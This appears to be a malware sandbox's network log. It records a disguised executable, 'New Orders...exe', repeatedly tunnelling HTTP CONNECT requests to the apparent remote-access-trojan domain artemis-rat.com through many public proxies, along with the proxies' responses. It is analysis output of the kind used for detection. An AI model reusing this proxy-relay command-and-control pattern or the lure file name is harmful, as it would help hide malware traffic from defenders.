                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        728192.168.2.952357172.67.181.11807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.582880020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.736875057 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        729192.168.2.951087208.109.14.49460477672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.589174986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.728079081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.742244005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.742163897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.811343908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.945002079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:30.945354939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        730192.168.2.952123123.110.158.236807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.608083010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        731192.168.2.95212943.129.228.4678917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.608109951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.273322105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        732192.168.2.95211745.178.133.759997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.608769894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.931570053 CET19INHTTP/1.1 200 OK
                                                                                        Mar 11, 2024 16:18:56.891243935 CET202INHTTP/1.0 504 Gateway Timeout
                                                                                        Content-Length: 735
                                                                                        Content-Type: text/html
                                                                                        Date: Sat, 13 Jan 2024 18:22:42 GMT
                                                                                        Expires: Sat, 13 Jan 2024 18:22:42 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        733192.168.2.95217718.135.133.11631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.609852076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.901400089 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        734192.168.2.95217398.170.57.23141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.610071898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        735192.168.2.95226452.73.224.5431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.610244036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.826881886 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        736192.168.2.952119202.179.184.4454307672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.612519979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        737192.168.2.95225767.43.236.2222117672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.612821102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.886617899 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        738192.168.2.952121186.124.164.213807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.614398003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        739192.168.2.95212679.110.196.14580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.616261959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        740192.168.2.95229047.229.171.15031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.617052078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.273298979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.961282015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.476537943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.273443937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.164031029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.964751005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.460998058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.463596106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        741192.168.2.952226114.156.77.10780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.617269993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.911830902 CET1286INHTTP/1.1 403 Forbidden
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Cache-Control: no-cache
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Length: 4872
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet"> <style type="text/css"> body { height: 100%; font-family: Roboto, Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff;


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        742192.168.2.9521375.252.23.22010817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.618798018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        743192.168.2.95215390.74.184.329997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.619313955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.273364067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.273794889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.160041094 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        744192.168.2.95210662.33.53.24831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.620986938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.955281973 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        745192.168.2.9521895.75.192.13807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.621809959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        746192.168.2.95212591.148.127.16280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.689538002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        747192.168.2.951213189.240.60.16490907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.693085909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.966176033 CET72INHTTP/1.1 200 Connection established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        748192.168.2.95211693.157.248.108887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.693134069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        749192.168.2.95213091.202.230.21980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.693209887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        750192.168.2.951853117.160.250.13488997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.693211079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.318501949 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
